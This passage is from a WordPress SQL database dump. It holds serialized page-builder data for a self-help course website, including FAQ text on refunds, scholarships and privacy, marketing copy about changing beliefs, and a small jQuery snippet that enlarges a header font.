How long will I have access to the course?</strong>\n\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\n\n<strong>Q: Are there scholarships available?</strong>\n\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\n\n<strong>Q: What is your refund policy?</strong>\n\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\n\n<strong>Q: How can I reach Customer Support?</strong>\n\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\n\n<strong>Q: What is your Privacy Policy?</strong>\n\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\n\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\n\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.\n\n<script>// <![CDATA[\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\n// ]]></script>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"20";s:4:"cell";s:1:"0";s:2:"id";s:2:"53";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:21:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"2";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"3";}i:7;a:1:{s:5:"cells";s:1:"1";}i:8;a:1:{s:5:"cells";s:1:"1";}i:9;a:1:{s:5:"cells";s:1:"1";}i:10;a:1:{s:5:"cells";s:1:"1";}i:11;a:1:{s:5:"cells";s:1:"2";}i:12;a:1:{s:5:"cells";s:1:"1";}i:13;a:1:{s:5:"cells";s:1:"1";}i:14;a:1:{s:5:"cells";s:1:"1";}i:15;a:1:{s:5:"cells";s:1:"1";}i:16;a:1:{s:5:"cells";s:1:"1";}i:17;a:1:{s:5:"cells";s:1:"1";}i:18;a:1:{s:5:"cells";s:1:"1";}i:19;a:1:{s:5:"cells";s:1:"1";}i:20;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:27:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.5984943538268507";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:9;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:10;a:2:{s:6:"weight";s:18:"0.8996235884567128";s:4:"grid";s:1:"6";}i:11;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:12;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}i:13;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"8";}i:14;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"9";}i:15;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"10";}i:16;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:2:"11";}i:17;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:2:"11";}i:18;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"12";}i:19;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"13";}i:20;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"14";}i:21;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"15";}i:22;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"16";}i:23;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"17";}i:24;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"18";}i:25;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"19";}i:26;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"20";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1563, 2011, 'panels_data', 'a:3:{s:7:"widgets";a:27:{i:0;a:1:{s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}i:1;a:1:{s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:1:{s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:14:"WP_Widget_Text";}}i:3;a:1:{s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"3";s:5:"class";s:14:"WP_Widget_Text";}}i:4;a:1:{s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"1";s:2:"id";s:1:"4";s:5:"class";s:14:"WP_Widget_Text";}}i:5;a:1:{s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:14:"WP_Widget_Text";}}i:6;a:1:{s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:14:"WP_Widget_Text";}}i:7;a:1:{s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:14:"WP_Widget_Text";}}i:8;a:1:{s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"1";s:2:"id";s:1:"8";s:5:"class";s:14:"WP_Widget_Text";}}i:9;a:1:{s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:1:"9";s:5:"class";s:14:"WP_Widget_Text";}}i:10;a:1:{s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:2:"10";s:5:"class";s:14:"WP_Widget_Text";}}i:11;a:1:{s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"11";s:5:"class";s:14:"WP_Widget_Text";}}i:12;a:1:{s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"12";s:5:"class";s:14:"WP_Widget_Text";}}i:13;a:1:{s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"0";s:2:"id";s:2:"13";s:5:"class";s:14:"WP_Widget_Text";}}i:14;a:3:{s:3:"src";s:74:"http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg";s:4:"href";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"1";s:2:"id";s:2:"14";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Image";}}i:15;a:1:{s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"15";s:5:"class";s:14:"WP_Widget_Text";}}i:16;a:1:{s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"16";s:5:"class";s:14:"WP_Widget_Text";}}i:17;a:4:{s:5:"title";s:0:"";s:4:"text";s:0:"";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"17";s:5:"class";s:14:"WP_Widget_Text";}}i:18;a:1:{s:4:"info";a:4:{s:4:"grid";s:2:"14";s:4:"cell";s:1:"0";s:2:"id";s:2:"18";s:5:"class";s:14:"WP_Widget_Text";}}i:19;a:1:{s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"19";s:5:"class";s:14:"WP_Widget_Text";}}i:20;a:1:{s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"20";s:5:"class";s:14:"WP_Widget_Text";}}i:21;a:1:{s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"21";s:5:"class";s:14:"WP_Widget_Text";}}i:22;a:1:{s:4:"info";a:4:{s:4:"grid";s:2:"16";s:4:"cell";s:1:"0";s:2:"id";s:2:"22";s:5:"class";s:14:"WP_Widget_Text";}}i:23;a:1:{s:4:"info";a:4:{s:4:"grid";s:2:"17";s:4:"cell";s:1:"0";s:2:"id";s:2:"23";s:5:"class";s:14:"WP_Widget_Text";}}i:24;a:1:{s:4:"info";a:4:{s:4:"grid";s:2:"18";s:4:"cell";s:1:"0";s:2:"id";s:2:"24";s:5:"class";s:14:"WP_Widget_Text";}}i:25;a:1:{s:4:"info";a:4:{s:4:"grid";s:2:"19";s:4:"cell";s:1:"0";s:2:"id";s:2:"25";s:5:"class";s:14:"WP_Widget_Text";}}i:26;a:1:{s:4:"info";a:4:{s:4:"grid";s:2:"20";s:4:"cell";s:1:"0";s:2:"id";s:2:"26";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:21:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"2";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"3";}i:7;a:1:{s:5:"cells";s:1:"1";}i:8;a:1:{s:5:"cells";s:1:"1";}i:9;a:1:{s:5:"cells";s:1:"1";}i:10;a:1:{s:5:"cells";s:1:"1";}i:11;a:1:{s:5:"cells";s:1:"2";}i:12;a:1:{s:5:"cells";s:1:"1";}i:13;a:1:{s:5:"cells";s:1:"1";}i:14;a:1:{s:5:"cells";s:1:"1";}i:15;a:1:{s:5:"cells";s:1:"1";}i:16;a:1:{s:5:"cells";s:1:"1";}i:17;a:1:{s:5:"cells";s:1:"1";}i:18;a:1:{s:5:"cells";s:1:"1";}i:19;a:1:{s:5:"cells";s:1:"1";}i:20;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:27:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.5984943538268507";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:9;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:10;a:2:{s:6:"weight";s:18:"0.8996235884567128";s:4:"grid";s:1:"6";}i:11;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:12;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}i:13;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"8";}i:14;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"9";}i:15;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"10";}i:16;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:2:"11";}i:17;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:2:"11";}i:18;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"12";}i:19;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"13";}i:20;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"14";}i:21;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"15";}i:22;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"16";}i:23;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"17";}i:24;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"18";}i:25;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"19";}i:26;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"20";}}}'),
(1564, 2012, 'panels_data', 'a:3:{s:7:"widgets";a:27:{i:0;a:1:{s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}i:1;a:1:{s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:1:{s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:14:"WP_Widget_Text";}}i:3;a:1:{s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"3";s:5:"class";s:14:"WP_Widget_Text";}}i:4;a:1:{s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"1";s:2:"id";s:1:"4";s:5:"class";s:14:"WP_Widget_Text";}}i:5;a:1:{s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:14:"WP_Widget_Text";}}i:6;a:1:{s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:14:"WP_Widget_Text";}}i:7;a:1:{s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:14:"WP_Widget_Text";}}i:8;a:1:{s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"1";s:2:"id";s:1:"8";s:5:"class";s:14:"WP_Widget_Text";}}i:9;a:1:{s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:1:"9";s:5:"class";s:14:"WP_Widget_Text";}}i:10;a:1:{s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:2:"10";s:5:"class";s:14:"WP_Widget_Text";}}i:11;a:1:{s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"11";s:5:"class";s:14:"WP_Widget_Text";}}i:12;a:1:{s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"12";s:5:"class";s:14:"WP_Widget_Text";}}i:13;a:1:{s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"0";s:2:"id";s:2:"13";s:5:"class";s:14:"WP_Widget_Text";}}i:14;a:3:{s:3:"src";s:74:"http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg";s:4:"href";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"1";s:2:"id";s:2:"14";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Image";}}i:15;a:1:{s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"15";s:5:"class";s:14:"WP_Widget_Text";}}i:16;a:1:{s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"16";s:5:"class";s:14:"WP_Widget_Text";}}i:17;a:4:{s:5:"title";s:0:"";s:4:"text";s:0:"";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"17";s:5:"class";s:14:"WP_Widget_Text";}}i:18;a:1:{s:4:"info";a:4:{s:4:"grid";s:2:"14";s:4:"cell";s:1:"0";s:2:"id";s:2:"18";s:5:"class";s:14:"WP_Widget_Text";}}i:19;a:1:{s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"19";s:5:"class";s:14:"WP_Widget_Text";}}i:20;a:1:{s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"20";s:5:"class";s:14:"WP_Widget_Text";}}i:21;a:1:{s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"21";s:5:"class";s:14:"WP_Widget_Text";}}i:22;a:1:{s:4:"info";a:4:{s:4:"grid";s:2:"16";s:4:"cell";s:1:"0";s:2:"id";s:2:"22";s:5:"class";s:14:"WP_Widget_Text";}}i:23;a:1:{s:4:"info";a:4:{s:4:"grid";s:2:"17";s:4:"cell";s:1:"0";s:2:"id";s:2:"23";s:5:"class";s:14:"WP_Widget_Text";}}i:24;a:1:{s:4:"info";a:4:{s:4:"grid";s:2:"18";s:4:"cell";s:1:"0";s:2:"id";s:2:"24";s:5:"class";s:14:"WP_Widget_Text";}}i:25;a:1:{s:4:"info";a:4:{s:4:"grid";s:2:"19";s:4:"cell";s:1:"0";s:2:"id";s:2:"25";s:5:"class";s:14:"WP_Widget_Text";}}i:26;a:1:{s:4:"info";a:4:{s:4:"grid";s:2:"20";s:4:"cell";s:1:"0";s:2:"id";s:2:"26";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:21:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"2";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"3";}i:7;a:1:{s:5:"cells";s:1:"1";}i:8;a:1:{s:5:"cells";s:1:"1";}i:9;a:1:{s:5:"cells";s:1:"1";}i:10;a:1:{s:5:"cells";s:1:"1";}i:11;a:1:{s:5:"cells";s:1:"2";}i:12;a:1:{s:5:"cells";s:1:"1";}i:13;a:1:{s:5:"cells";s:1:"1";}i:14;a:1:{s:5:"cells";s:1:"1";}i:15;a:1:{s:5:"cells";s:1:"1";}i:16;a:1:{s:5:"cells";s:1:"1";}i:17;a:1:{s:5:"cells";s:1:"1";}i:18;a:1:{s:5:"cells";s:1:"1";}i:19;a:1:{s:5:"cells";s:1:"1";}i:20;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:27:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.5984943538268507";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:9;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:10;a:2:{s:6:"weight";s:18:"0.8996235884567128";s:4:"grid";s:1:"6";}i:11;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:12;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}i:13;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"8";}i:14;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"9";}i:15;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"10";}i:16;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:2:"11";}i:17;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:2:"11";}i:18;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"12";}i:19;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"13";}i:20;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"14";}i:21;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"15";}i:22;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"16";}i:23;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"17";}i:24;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"18";}i:25;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"19";}i:26;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"20";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1562, 2010, 'panels_data', 'a:3:{s:7:"widgets";a:27:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:137:"<div class="top-img"> <img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg"> </div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:650:"<div class="quot custo-quot" style="margin-top: 0px; text-align: center;">\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:5:"title";s:0:"";s:4:"text";s:95:"<div class="parg-title"><h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:14:"WP_Widget_Text";}}i:3;a:4:{s:5:"title";s:0:"";s:4:"text";s:483:"<div class="parg-text"><p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"3";s:5:"class";s:14:"WP_Widget_Text";}}i:4;a:4:{s:5:"title";s:0:"";s:4:"text";s:183:"<div class="parg-img"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"1";s:2:"id";s:1:"4";s:5:"class";s:14:"WP_Widget_Text";}}i:5;a:4:{s:5:"title";s:0:"";s:4:"text";s:132:"<div class="parg-title"><h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:14:"WP_Widget_Text";}}i:6;a:4:{s:5:"title";s:0:"";s:4:"text";s:322:"<div class="parg-text"><p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:14:"WP_Widget_Text";}}i:7;a:4:{s:5:"title";s:0:"";s:4:"text";s:277:"<div class="parg-text"><p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:14:"WP_Widget_Text";}}i:8;a:4:{s:5:"title";s:0:"";s:4:"text";s:228:"<a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I’m convinced!<br />Take me to the program description,<br />tell me about all the cool bonuses I’ll get,<br />and how much it costs...</a>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"1";s:2:"id";s:1:"8";s:5:"class";s:14:"WP_Widget_Text";}}i:9;a:4:{s:5:"title";s:0:"";s:4:"text";s:61:"<div class="parg-title"><h1>\nWhy Does This Happen?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:1:"9";s:5:"class";s:14:"WP_Widget_Text";}}i:10;a:4:{s:5:"title";s:0:"";s:4:"text";s:833:"<div class="parg-img pull-left"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:2:"10";s:5:"class";s:14:"WP_Widget_Text";}}i:11;a:4:{s:5:"title";s:0:"";s:4:"text";s:97:"<div class="parg-title"><h1>To Make Real Change, You Have To Get To The Root of Things</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"11";s:5:"class";s:14:"WP_Widget_Text";}}i:12;a:4:{s:5:"title";s:0:"";s:4:"text";s:302:"<div class="parg-text"><p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"12";s:5:"class";s:14:"WP_Widget_Text";}}i:13;a:4:{s:5:"title";s:0:"";s:4:"text";s:225:"<div class="parg-text"><p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"0";s:2:"id";s:2:"13";s:5:"class";s:14:"WP_Widget_Text";}}i:14;a:3:{s:3:"src";s:74:"http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg";s:4:"href";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"1";s:2:"id";s:2:"14";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Image";}}i:15;a:4:{s:5:"title";s:0:"";s:4:"text";s:84:"<div 